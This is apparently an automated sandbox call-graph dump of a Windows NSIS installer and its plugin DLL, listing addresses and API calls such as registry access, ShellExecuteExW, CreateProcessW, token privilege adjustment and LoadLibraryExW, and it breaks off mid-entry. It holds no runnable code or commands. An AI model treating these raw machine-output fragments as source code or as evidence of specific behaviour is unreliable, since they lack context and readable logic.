5263 4022f1 5261->5263 5267 405a4e MessageBoxIndirectW 5263->5267 5273 4063e8 lstrcpynW 5264->5273 5265 401bdf GlobalFree 5265->5272 5267->5272 5268 401baa 5274 4063e8 lstrcpynW 5268->5274 5270 401bb9 5276 4063e8 lstrcpynW 5270->5276 5273->5268 5274->5270 5275->5265 5276->5272 5277 4024f8 5278 402c81 17 API calls 5277->5278 5279 402502 5278->5279 5280 402c1f 17 API calls 5279->5280 5281 40250b 5280->5281 5282 402533 RegEnumValueW 5281->5282 5283 402527 RegEnumKeyW 5281->5283 5286 40288b 5281->5286 5284 40254f RegCloseKey 5282->5284 5285 402548 5282->5285 5283->5284 5284->5286 5285->5284 5580 72ed16d4 5581 72ed1703 5580->5581 5582 72ed1b5f 22 API calls 5581->5582 5583 72ed170a 5582->5583 5584 72ed171d 5583->5584 5585 72ed1711 5583->5585 5587 72ed1744 5584->5587 5588 72ed1727 5584->5588 5586 72ed1272 2 API calls 5585->5586 5589 72ed171b 5586->5589 5591 72ed176e 5587->5591 5592 72ed174a 5587->5592 5590 72ed153d 3 API calls 5588->5590 5594 72ed172c 5590->5594 5593 72ed153d 3 API calls 5591->5593 5595 72ed15b4 3 API calls 5592->5595 5593->5589 5596 72ed15b4 3 API calls 5594->5596 5597 72ed174f 5595->5597 5598 72ed1732 5596->5598 5599 72ed1272 2 API calls 5597->5599 5601 72ed1272 2 API calls 5598->5601 5600 72ed1755 GlobalFree 5599->5600 5600->5589 5602 72ed1769 GlobalFree 5600->5602 5603 72ed1738 GlobalFree 5601->5603 5602->5589 5603->5589 5604 72ed2c57 5605 72ed2c6f 5604->5605 5606 72ed158f 2 API calls 5605->5606 5607 72ed2c8a 5606->5607 5288 40167b 5289 402c41 17 API calls 5288->5289 5290 401682 5289->5290 5291 402c41 17 API calls 5290->5291 5292 40168b 5291->5292 5293 402c41 17 API calls 5292->5293 5294 401694 MoveFileW 5293->5294 5295 4016a0 5294->5295 5296 4016a7 5294->5296 5298 401423 24 API calls 5295->5298 5297 40672b 2 API calls 5296->5297 5300 402250 5296->5300 5299 4016b6 5297->5299 5298->5300 5299->5300 5301 4061ae 36 API calls 5299->5301 5301->5295 5615 401e7d 5616 402c41 17 API calls 5615->5616 5617 401e83 5616->5617 5618 402c41 17 API calls 5617->5618 5619 401e8c 5618->5619 5620 402c41 17 API calls 5619->5620 5621 401e95 5620->5621 5622 402c41 17 API calls 5621->5622 5623 401e9e 5622->5623 5624 401423 24 API calls 5623->5624 5625 401ea5 5624->5625 5632 405a14 ShellExecuteExW 5625->5632 5627 401ee7 5629 40288b 5627->5629 5633 406873 WaitForSingleObject 5627->5633 5630 401f01 CloseHandle 5630->5629 5632->5627 5634 40688d 5633->5634 5635 40689f GetExitCodeProcess 5634->5635 5636 4067fe 2 API calls 5634->5636 5635->5630 5637 406894 WaitForSingleObject 5636->5637 5637->5634 5638 4019ff 5639 402c41 17 API calls 5638->5639 5640 401a06 5639->5640 5641 402c41 17 API calls 5640->5641 5642 401a0f 5641->5642 5643 401a16 lstrcmpiW 5642->5643 5644 401a28 lstrcmpW 5642->5644 5645 401a1c 5643->5645 5644->5645 5646 401000 5647 401037 BeginPaint GetClientRect 5646->5647 5648 40100c DefWindowProcW 5646->5648 5650 4010f3 5647->5650 5651 401179 5648->5651 5652 401073 CreateBrushIndirect FillRect DeleteObject 5650->5652 5653 4010fc 5650->5653 5652->5650 5654 401102 CreateFontIndirectW 5653->5654 5655 401167 EndPaint 5653->5655 5654->5655 5656 401112 6 API calls 5654->5656 5655->5651 5656->5655 5657 401503 5658 40150b 5657->5658 5660 40151e 5657->5660 5659 402c1f 17 API calls 5658->5659 5659->5660 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4535 40288b 4531->4535 4533 4024c8 RegCloseKey 4532->4533 4534 4024c2 4532->4534 4533->4535 4534->4533 4543 40632f wsprintfW 4534->4543 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4533 5661 402104 5662 402c41 17 API calls 5661->5662 5663 40210b 5662->5663 5664 402c41 17 API calls 5663->5664 5665 402115 5664->5665 5666 402c41 17 API calls 5665->5666 5667 40211f 5666->5667 5668 402c41 17 API calls 5667->5668 5669 402129 5668->5669 5670 402c41 17 API calls 5669->5670 5672 402133 5670->5672 5671 402172 CoCreateInstance 5676 402191 5671->5676 5672->5671 5673 402c41 17 API calls 5672->5673 5673->5671 5674 401423 24 API calls 5675 402250 5674->5675 5676->5674 5676->5675 4787 403e86 4788 403fd9 4787->4788 4789 403e9e 4787->4789 4790 403fea GetDlgItem GetDlgItem 4788->4790 4796 40402a 4788->4796 4789->4788 4791 403eaa 4789->4791 4794 40435f 18 API calls 4790->4794 4792 403eb5 SetWindowPos 4791->4792 4793 403ec8 4791->4793 4792->4793 4797 403ee5 4793->4797 4798 403ecd ShowWindow 4793->4798 4799 404014 SetClassLongW 4794->4799 4795 404084 4800 4043ab SendMessageW 4795->4800 4805 403fd4 4795->4805 4796->4795 4804 401389 2 API calls 4796->4804 4801 403f07 4797->4801 4802 403eed DestroyWindow 4797->4802 4798->4797 4803 40140b 2 API calls 4799->4803 4828 404096 4800->4828 4807 403f0c SetWindowLongW 4801->4807 4808 403f1d 4801->4808 4806 404309 4802->4806 4803->4796 4809 40405c 4804->4809 4806->4805 4815 404319 ShowWindow 4806->4815 4807->4805 4812 403fc6 4808->4812 4813 403f29 GetDlgItem 4808->4813 4809->4795 4814 404060 SendMessageW 4809->4814 4810 40140b 2 API calls 4810->4828 4811 4042ea DestroyWindow EndDialog 4811->4806 4868 4043c6 4812->4868 4816 403f59 4813->4816 4817 403f3c SendMessageW IsWindowEnabled 4813->4817 4814->4805 4815->4805 4820 403f66 4816->4820 4821 403f79 4816->4821 4822 403fad SendMessageW 4816->4822 4831 403f5e 4816->4831 4817->4805 4817->4816 4819 40640a 17 API calls 4819->4828 4820->4822 4820->4831 4825 403f81 4821->4825 4826 403f96 4821->4826 4822->4812 4824 40435f 18 API calls 4824->4828 4829 40140b 2 API calls 4825->4829 4830 40140b 2 API calls 4826->4830 4827 403f94 4827->4812 4828->4805 4828->4810 4828->4811 4828->4819 4828->4824 4849 40422a DestroyWindow 4828->4849 4859 40435f 4828->4859 4829->4831 4832 403f9d 4830->4832 4865 404338 4831->4865 4832->4812 4832->4831 4834 404111 GetDlgItem 4835 404126 4834->4835 4836 40412e ShowWindow KiUserCallbackDispatcher 4834->4836 4835->4836 4862 404381 EnableWindow 4836->4862 4838 404158 EnableWindow 4843 40416c 4838->4843 4839 404171 GetSystemMenu EnableMenuItem SendMessageW 4840 4041a1 SendMessageW 4839->4840 4839->4843 4840->4843 4842 403e67 18 API calls 4842->4843 4843->4839 4843->4842 4863 404394 SendMessageW 4843->4863 4864 4063e8 lstrcpynW 4843->4864 4845 4041d0 lstrlenW 4846 40640a 17 API calls 4845->4846 4847 4041e6 SetWindowTextW 4846->4847 4848 401389 2 API calls 4847->4848 4848->4828 4849->4806 4850 404244 CreateDialogParamW 4849->4850 4850->4806 4851 404277 4850->4851 4852 40435f 18 API calls 4851->4852 4853 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4852->4853 4854 401389 2 API calls 4853->4854 4855 4042c8 4854->4855 4855->4805 4856 4042d0 ShowWindow 4855->4856 4857 4043ab SendMessageW 4856->4857 4858 4042e8 4857->4858 4858->4806 4860 40640a 17 API calls 4859->4860 4861 40436a SetDlgItemTextW 4860->4861 4861->4834 4862->4838 4863->4843 4864->4845 4866 404345 SendMessageW 4865->4866 4867 40433f 4865->4867 4866->4827 4867->4866 4869 404489 4868->4869 4870 4043de GetWindowLongW 4868->4870 4869->4805 4870->4869 4871 4043f3 4870->4871 4871->4869 4872 404420 GetSysColor 4871->4872 4873 404423 4871->4873 4872->4873 4874 404433 SetBkMode 4873->4874 4875 404429 SetTextColor 4873->4875 4876 404451 4874->4876 4877 40444b GetSysColor 4874->4877 4875->4874 4878 404462 4876->4878 4879 404458 SetBkColor 4876->4879 4877->4876 4878->4869 4880 404475 DeleteObject 4878->4880 4881 40447c CreateBrushIndirect 4878->4881 4879->4878 4880->4881 4881->4869 5677 401f06 5678 402c41 17 API calls 5677->5678 5679 401f0c 5678->5679 5680 405450 24 API calls 5679->5680 5681 401f16 5680->5681 5682 4059d1 2 API calls 5681->5682 5683 401f1c 5682->5683 5684 401f3f CloseHandle 5683->5684 5685 406873 5 API calls 5683->5685 5687 40288b 5683->5687 5684->5687 5688 401f31 5685->5688 5688->5684 5690 40632f wsprintfW 5688->5690 5690->5684 5691 404809 5692 404819 5691->5692 5693 40483f 5691->5693 5694 40435f 18 API calls 5692->5694 5695 4043c6 8 API calls 5693->5695 5696 404826 SetDlgItemTextW 5694->5696 5697 40484b 5695->5697 5696->5693 5698 40190c 5699 401943 5698->5699 5700 402c41 17 API calls 5699->5700 5701 401948 5700->5701 5702 405afa 67 API calls 5701->5702 5703 401951 5702->5703 5704 40230c 5705 402314 5704->5705 5706 40231a 5704->5706 5707 402c41 17 API calls 5705->5707 5708 402c41 17 API calls 5706->5708 5710 402328 5706->5710 5707->5706 5708->5710 5709 402336 5711 402c41 17 API calls 5709->5711 5710->5709 5712 402c41 17 API calls 5710->5712 5713 40233f WritePrivateProfileStringW 5711->5713 5712->5709 5714 401f8c 5715 402c41 17 API calls 5714->5715 5716 401f93 5715->5716 5717 4067c2 5 API calls 5716->5717 5718 401fa2 5717->5718 5719 401fbe GlobalAlloc 5718->5719 5720 402026 5718->5720 5719->5720 5721 401fd2 5719->5721 5722 4067c2 5 API calls 5721->5722 5723 401fd9 5722->5723 5724 4067c2 5 API calls 5723->5724 5725 401fe3 5724->5725 5725->5720 5729 40632f wsprintfW 5725->5729 5727 402018 5730 40632f wsprintfW 5727->5730 5729->5727 5730->5720 4983 40238e 4984 4023c1 4983->4984 4985 402396 4983->4985 4987 402c41 17 API calls 4984->4987 4986 402c81 17 API calls 4985->4986 4988 40239d 4986->4988 4989 4023c8 4987->4989 4990 4023a7 4988->4990 4992 4023d5 4988->4992 4995 402cff 4989->4995 4993 402c41 17 API calls 4990->4993 4994 4023ae RegDeleteValueW RegCloseKey 4993->4994 4994->4992 4996 402d13 4995->4996 4997 402d0c 4995->4997 4996->4997 4999 402d44 4996->4999 4997->4992 5000 406255 RegOpenKeyExW 4999->5000 5001 402d72 5000->5001 5002 402dec 5001->5002 5006 402d76 5001->5006 5002->4997 5003 402d98 RegEnumKeyW 5004 402daf RegCloseKey 5003->5004 5003->5006 5007 4067c2 5 API calls 5004->5007 5005 402dd0 RegCloseKey 5005->5002 5006->5003 5006->5004 5006->5005 5009 402d44 6 API calls 5006->5009 5008 402dbf 5007->5008 5010 402de0 RegDeleteKeyW 5008->5010 5011 402dc3 5008->5011 5009->5006 5010->5002 5011->5002 5731 40190f 5732 402c41 17 API calls 5731->5732 5733 401916 5732->5733 5734 405a4e MessageBoxIndirectW 5733->5734 5735 40191f 5734->5735 5736 40558f 5737 4055b0 GetDlgItem GetDlgItem GetDlgItem 5736->5737 5738 405739 5736->5738 5781 404394 SendMessageW 5737->5781 5740 405742 GetDlgItem CreateThread CloseHandle 5738->5740 5741 40576a 5738->5741 5740->5741 5743 405781 ShowWindow ShowWindow 5741->5743 5744 4057ba 5741->5744 5745 405795 5741->5745 5742 405620 5747 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5742->5747 5783 404394 SendMessageW 5743->5783 5751 4043c6 8 API calls 5744->5751 5746 4057f5 5745->5746 5749 4057a9 5745->5749 5750 4057cf ShowWindow 5745->5750 5746->5744 5754 405803 SendMessageW 5746->5754 5752 405695 5747->5752 5753 405679 SendMessageW SendMessageW 5747->5753 5755 404338 SendMessageW 5749->5755 5757 4057e1 5750->5757 5758 4057ef 5750->5758 5756 4057c8 5751->5756 5761 4056a8 5752->5761 5762 40569a SendMessageW 5752->5762 5753->5752 5754->5756 5763 40581c CreatePopupMenu 5754->5763 5755->5744 5759 405450 24 API calls 5757->5759 5760 404338 SendMessageW 5758->5760 5759->5758 5760->5746 5765 40435f 18 API calls 5761->5765 5762->5761 5764 40640a 17 API calls 5763->5764 5766 40582c AppendMenuW 5764->5766 5767 4056b8 5765->5767 5768 405849 GetWindowRect 5766->5768 5769 40585c TrackPopupMenu 5766->5769 5770 4056c1 ShowWindow 5767->5770 5771 4056f5 GetDlgItem SendMessageW 5767->5771 5768->5769 5769->5756 5773 405877 5769->5773 5774 4056e4 5770->5774 5775 4056d7 ShowWindow 5770->5775 5771->5756 5772 40571c SendMessageW SendMessageW 5771->5772 5772->5756 5776 405893 SendMessageW 5773->5776 5782 404394 SendMessageW 5774->5782 5775->5774 5776->5776 5777 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5776->5777 5779 4058d5 SendMessageW 5777->5779 5779->5779 5780 4058fe GlobalUnlock SetClipboardData CloseClipboard 5779->5780 5780->5756 5781->5742 5782->5771 5783->5745 5784 72ed103d 5787 72ed101b 5784->5787 5788 72ed1516 GlobalFree 5787->5788 5789 72ed1020 5788->5789 5790 72ed1024 5789->5790 5791 72ed1027 GlobalAlloc 5789->5791 5792 72ed153d 3 API calls 5790->5792 5791->5790 5793 72ed103b 5792->5793 5794 401491 5795 405450 24 API calls 5794->5795 5796 401498 5795->5796 5804 401d14 5805 402c1f 17 API calls 5804->5805 5806 401d1b 5805->5806 5807 402c1f 17 API calls 5806->5807 5808 401d27 GetDlgItem 5807->5808 5809 402592 5808->5809 5810 404495 lstrcpynW lstrlenW 5811 403a96 5812 403aa1 5811->5812 5813 403aa5 5812->5813 5814 403aa8 GlobalAlloc 5812->5814 5814->5813 5815 402598 5816 4025c7 5815->5816 5817 4025ac 5815->5817 5819 4025fb 5816->5819 5820 4025cc 5816->5820 5818 402c1f 17 API calls 5817->5818 5827 4025b3 5818->5827 5822 402c41 17 API calls 5819->5822 5821 402c41 17 API calls 5820->5821 5824 4025d3 WideCharToMultiByte lstrlenA 5821->5824 5823 402602 lstrlenW 5822->5823 5823->5827 5824->5827 5825 402645 5826 40262f 5826->5825 5828 405f90 WriteFile 5826->5828 5827->5825 5827->5826 5829 405fbf 5 API calls 5827->5829 5828->5825 5829->5826 5830 40451e 5831 404536 5830->5831 5834 404650 5830->5834 5835 40435f 18 API calls 5831->5835 5832 4046ba 5833 4046c4 GetDlgItem 5832->5833 5836 404784 5832->5836 5837 404745 5833->5837 5838 4046de 5833->5838 5834->5832 5834->5836 5839 40468b GetDlgItem SendMessageW 5834->5839 5840 40459d 5835->5840 5841 4043c6 8 API calls 5836->5841 5837->5836 5846 404757 5837->5846 5838->5837 5845 404704 SendMessageW LoadCursorW SetCursor 5838->5845 5863 404381 EnableWindow 5839->5863 5843 40435f 18 API calls 5840->5843 5844 40477f 5841->5844 5848 4045aa CheckDlgButton 5843->5848 5864 4047cd 5845->5864 5850 40476d 5846->5850 5851 40475d SendMessageW 5846->5851 5847 4046b5 5853 4047a9 SendMessageW 5847->5853 5861 404381 EnableWindow 5848->5861 5850->5844 5852 404773 SendMessageW 5850->5852 5851->5850 5852->5844 5853->5832 5856 4045c8 GetDlgItem 5862 404394 SendMessageW 5856->5862 5858 4045de SendMessageW 5859 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5858->5859 5860 4045fb GetSysColor 5858->5860 5859->5844 5860->5859 5861->5856 5862->5858 5863->5847 5867 405a14 ShellExecuteExW 5864->5867 5866 404733 LoadCursorW SetCursor 5866->5837 5867->5866 5868 40149e 5869 4022f7 5868->5869 5870 4014ac PostQuitMessage 5868->5870 5870->5869 5871 401c1f 5872 402c1f 17 API calls 5871->5872 5873 401c26 5872->5873 5874 402c1f 17 API calls 5873->5874 5875 401c33 5874->5875 5876 401c48 5875->5876 5877 402c41 17 API calls 5875->5877 5878 401c58 5876->5878 5879 402c41 17 API calls 5876->5879 5877->5876 5880 401c63 5878->5880 5881 401caf 5878->5881 5879->5878 5883 402c1f 17 API calls 5880->5883 5882 402c41 17 API calls 5881->5882 5884 401cb4 5882->5884 5885 401c68 5883->5885 5886 402c41 17 API calls 5884->5886 5887 402c1f 17 API calls 5885->5887 5888 401cbd FindWindowExW 5886->5888 5889 401c74 5887->5889 5892 401cdf 5888->5892 5890 401c81 SendMessageTimeoutW 5889->5890 5891 401c9f SendMessageW 5889->5891 5890->5892 5891->5892 5893 402aa0 SendMessageW 5894 402aba InvalidateRect 5893->5894 5895 402ac5 5893->5895 5894->5895 5896 402821 5897 402827 5896->5897 5898 402ac5 5897->5898 5899 40282f FindClose 5897->5899 5899->5898 5900 4015a3 5901 402c41 17 API calls 5900->5901 5902 4015aa SetFileAttributesW 5901->5902 5903 4015bc 5902->5903 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4570 4035c6 4563->4570 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4571 403474 12 API calls 4567->4571 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4572 405cea CharNextW 4570->4572 4576 4036c0 4570->4576 4578 4036c2 4570->4578 4574 40370f 4571->4574 4572->4570 4573 40375d 4580 405cea CharNextW 4573->4580 4616 403800 4573->4616 4629 403810 4573->4629 4574->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4574->4575 4579 403474 12 API calls 4575->4579 4576->4564 4732 4063e8 lstrcpynW 4578->4732 4584 403741 4579->4584 4587 40377c 4580->4587 4584->4568 4584->4629 4585 40394a 4589 403952 GetCurrentProcess OpenProcessToken 4585->4589 4590 4039ce ExitProcess 4585->4590 4586 40382a 4744 405a4e 4586->4744 4594 403840 4587->4594 4595 4037da 4587->4595 4591 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4589->4591 4592 40399e 4589->4592 4591->4592 4597 4067c2 5 API calls 4592->4597 4599 4059b9 5 API calls 4594->4599 4598 405dc5 18 API calls 4595->4598 4600 4039a5 4597->4600 4601 4037e6 4598->4601 4602 403845 lstrcatW 4599->4602 4605 4039ba ExitWindowsEx 4600->4605 4608 4039c7 4600->4608 4601->4629 4733 4063e8 lstrcpynW 4601->4733 4603 403861 lstrcatW lstrcmpiW 4602->4603 4604 403856 lstrcatW 4602->4604 4607 40387d 4603->4607 4603->4629 4604->4603 4605->4590 4605->4608 4610 403882 4607->4610 4611 403889 4607->4611 4612 40140b 2 API calls 4608->4612 4609 4037f5 4734 4063e8 lstrcpynW 4609->4734 4614 40591f 4 API calls 4610->4614 4615 40599c 2 API calls 4611->4615 4612->4590 4617 403887 4614->4617 4618 40388e SetCurrentDirectoryW 4615->4618 4676 403ad8 4616->4676 4617->4618 4619 4038a9 4618->4619 4620 40389e 4618->4620 4749 4063e8 lstrcpynW 4619->4749 4748 4063e8 lstrcpynW 4620->4748 4623 40640a 17 API calls 4624 4038e8 DeleteFileW 4623->4624 4625 4038f5 CopyFileW 4624->4625 4631 4038b7 4624->4631 4625->4631 4626 40393e 4628 4061ae 36 API calls 4626->4628 4627 4061ae 36 API calls 4627->4631 4628->4629 4735 4039e6 4629->4735 4630 40640a 17 API calls 4630->4631 4631->4623 4631->4626 4631->4627 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4638 403480 4637->4638 4639 40348a 4638->4639 4640 405cbd 3 API calls 4638->4640 4639->4566 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4675 402f80 4648->4675 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4657 402fbe 4654->4657 4656 402e8e 32 API calls 4655->4656 4659 4030af 4656->4659 4657->4655 4658 403447 ReadFile 4657->4658 4660 403143 4657->4660 4667 402e8e 32 API calls 4657->4667 4657->4675 4658->4657 4661 4030eb GlobalAlloc 4659->4661 4659->4675 4761 40345d SetFilePointer 4659->4761 4663 402e8e 32 API calls 4660->4663 4662 403102 4661->4662 4668 405f0d 2 API calls 4662->4668 4663->4675 4665 4030cc 4666 403447 ReadFile 4665->4666 4669 4030d7 4666->4669 4667->4657 4670 403113 CreateFileW 4668->4670 4669->4661 4669->4675 4671 40314d 4670->4671 4670->4675 4760 40345d SetFilePointer 4671->4760 4673 40315b 4674 4031d6 44 API calls 4673->4674 4674->4675 4675->4573 4675->4675 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4683 403b53 lstrcatW 4682->4683 4685 4062b6 3 API calls 4682->4685 4686 403b02 4683->4686 4685->4683 4762 403dae 4686->4762 4689 405dc5 18 API calls 4690 403b85 4689->4690 4691 403c19 4690->4691 4693 4062b6 3 API calls 4690->4693 4692 405dc5 18 API calls 4691->4692 4694 403c1f 4692->4694 4695 403bb7 4693->4695 4696 403c2f LoadImageW 4694->4696 4699 40640a 17 API calls 4694->4699 4695->4691 4702 403bd8 lstrlenW 4695->4702 4706 405cea CharNextW 4695->4706 4697 403cd5 4696->4697 4698 403c56 RegisterClassW 4696->4698 4701 40140b 2 API calls 4697->4701 4700 403c8c SystemParametersInfoW CreateWindowExW 4698->4700 4731 403cdf 4698->4731 4699->4696 4700->4697 4705 403cdb 4701->4705 4703 403be6 lstrcmpiW 4702->4703 4704 403c0c 4702->4704 4703->4704 4708 403bf6 GetFileAttributesW 4703->4708 4709 405cbd 3 API calls 4704->4709 4711 403dae 18 API calls 4705->4711 4705->4731 4707 403bd5 4706->4707 4707->4702 4710 403c02 4708->4710 4712 403c12 4709->4712 4710->4704 4713 405d09 2 API calls 4710->4713 4714 403cec 4711->4714 4771 4063e8 lstrcpynW 4712->4771 4713->4704 4716 403cf8 ShowWindow 4714->4716 4717 403d7b 4714->4717 4719 406752 3 API calls 4716->4719 4772 405523 OleInitialize 4717->4772 4721 403d10 4719->4721 4720 403d81 4722 403d85 4720->4722 4723 403d9d 4720->4723 4724 403d1e GetClassInfoW 4721->4724 4728 406752 3 API calls 4721->4728 4730 40140b 2 API calls 4722->4730 4722->4731 4727 40140b 2 API calls 4723->4727 4725 403d32 GetClassInfoW RegisterClassW 4724->4725 4726 403d48 DialogBoxParamW 4724->4726 4725->4726 4729 40140b 2 API calls 4726->4729 4727->4731 4728->4724 4729->4731 4730->4731 4731->4629 4732->4576 4733->4609 4734->4616 4736 403a01 4735->4736 4737 4039f7 CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4585 4743->4586 4745 405a63 4744->4745 4746 403838 ExitProcess 4745->4746 4747 405a77 MessageBoxIndirectW 4745->4747 4747->4746 4748->4619 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4673 4761->4665 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4686 4771->4691 4773 4043ab SendMessageW 4772->4773 4775 405546 4773->4775 4774 4043ab SendMessageW 4776 40557f OleUninitialize 4774->4776 4777 401389 2 API calls 4775->4777 4778 40556d 4775->4778 4776->4720 4777->4775 4778->4774 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a1a 4784->4785 4786 403a56 FreeLibrary GlobalFree 4784->4786 4785->4742 4786->4785 4786->4786 5904 404ba6 5905 404bd2 5904->5905 5906 404bb6 5904->5906 5907 404c05 5905->5907 5908 404bd8 SHGetPathFromIDListW 5905->5908 5915 405a32 GetDlgItemTextW 5906->5915 5911 404bef SendMessageW 5908->5911 5912 404be8 5908->5912 5910 404bc3 SendMessageW 5910->5905 5911->5907 5913 40140b 2 API calls 5912->5913 5913->5911 5915->5910 5930 4029a8 5931 402c1f 17 API calls 5930->5931 5932 4029ae 5931->5932 5933 4029d5 5932->5933 5934 4029ee 5932->5934 5938 40288b 5932->5938 5937 4029da 5933->5937 5943 4029eb 5933->5943 5935 402a08 5934->5935 5936 4029f8 5934->5936 5940 40640a 17 API calls 5935->5940 5939 402c1f 17 API calls 5936->5939 5944 4063e8 lstrcpynW 5937->5944 5939->5943 5940->5943 5943->5938 5945 40632f wsprintfW 5943->5945 5944->5938 5945->5938 5946 72ed1000 5947 72ed101b 5 API calls 5946->5947 5948 72ed1019 5947->5948 5949 4028ad 5950 402c41 17 API calls 5949->5950 5952 4028bb 5950->5952 5951 4028d1 5954 405eb9 2 API calls 5951->5954 5952->5951 5953 402c41 17 API calls 5952->5953 5953->5951 5955 4028d7 5954->5955 5977 405ede GetFileAttributesW CreateFileW 5955->5977 5957 4028e4 5958 4028f0 GlobalAlloc 5957->5958 5959 402987 5957->5959 5962 402909 5958->5962 5963 40297e CloseHandle 5958->5963 5960 4029a2 5959->5960 5961 40298f DeleteFileW 5959->5961 5961->5960 5978 40345d SetFilePointer 5962->5978 5963->5959 5965 40290f 5966 403447 ReadFile 5965->5966 5967 402918 GlobalAlloc 5966->5967 5968 402928 5967->5968 5969 40295c 5967->5969 5970 4031d6 44 API calls 5968->5970 5971 405f90 WriteFile 5969->5971 5976 402935 5970->5976 5972 402968 GlobalFree 5971->5972 5973 4031d6 44 API calls 5972->5973 5974 40297b 5973->5974 5974->5963 5975 402953 GlobalFree 5975->5969 5976->5975 5977->5957 5978->5965 5986 401a30 5987 402c41 17 API calls 5986->5987 5988 401a39 ExpandEnvironmentStringsW 5987->5988 5989 401a4d 5988->5989 5991 401a60 5988->5991 5990 401a52 lstrcmpW 5989->5990 5989->5991 5990->5991 5063 402032 5064 402044 5063->5064 5065 4020f6 5063->5065 5066 402c41 17 API calls 5064->5066 5068 401423 24 API calls 5065->5068 5067 40204b 5066->5067 5069 402c41 17 API calls 5067->5069 5073 402250 5068->5073 5070 402054 5069->5070 5071 40206a LoadLibraryExW 5070->5071 5072 40205c GetModuleHandleW 5070->5072 5071->5065 5074 40207b 5071->5074 5072->5071 5072->5074 5086 406831 WideCharToMultiByte 5074->5086 5077 4020c5 5079 405450 24 API calls 5077->5079 5078 40208c 5080 402094 5078->5080 5081 4020ab 5078->5081 5083 40209c 5079->5083 5082 401423 24 API calls 5080->5082 5089 72ed1777 5081->5089 5082->5083 5083->5073 5084 4020e8 FreeLibrary 5083->5084 5084->5073 5087 40685b GetProcAddress 5086->5087 5088 402086 5086->5088 5087->5088 5088->5077 5088->5078 5090 72ed17aa 5089->5090 5131 72ed1b5f 5090->5131 5092 72ed17b1 5093 72ed18d6 5092->5093 5094 72ed17c9 5092->5094 5095 72ed17c2 5092->5095 5093->5083 5165 72ed2394 5094->5165 5181 72ed2352 5095->5181 5100 72ed182d 5105 72ed187e 5100->5105 5106 72ed1833 5100->5106 5101 72ed180f 5194 72ed2569 5101->5194 5102 72ed17df 5104 72ed17e5 5102->5104 5109 72ed17f0 5102->5109 5103 72ed17f8 5115 72ed17ee 5103->5115 5191 72ed2d37 5103->5191 5104->5115 5175 72ed2aac 5104->5175 5113 72ed2569 10 API calls 5105->5113 5213 72ed15c6 5106->5213 5108 72ed1815 5205 72ed15b4 5108->5205 5185 72ed2724 5109->5185 5122 72ed186f 5113->5122 5115->5100 5115->5101 5119 72ed17f6 5119->5115 5120 72ed2569 10 API calls 5120->5122 5123 72ed18c5 5122->5123 5219 72ed252c 5122->5219 5123->5093 5126 72ed18cf GlobalFree 5123->5126 5126->5093 5128 72ed18b1 5128->5123 5223 72ed153d wsprintfW 5128->5223 5129 72ed18aa FreeLibrary 5129->5128 5226 72ed121b GlobalAlloc 5131->5226 5133 72ed1b83 5227 72ed121b GlobalAlloc 5133->5227 5135 72ed1b8e 5136 72ed1da9 GlobalFree GlobalFree GlobalFree 5135->5136 5138 72ed1c64 GlobalAlloc 5135->5138 5141 72ed1caf lstrcpyW 5135->5141 5142 72ed1ccd GlobalFree 5135->5142 5147 72ed1cb9 lstrcpyW 5135->5147 5149 72ed20ec 5135->5149 5150 72ed1e10 5135->5150 5153 72ed2064 5135->5153 5158 72ed1d0b 5135->5158 5159 72ed1fa5 GlobalFree 5135->5159 5162 72ed122c 2 API calls 5135->5162 5137 72ed1dc6 5136->5137 5136->5150 5139 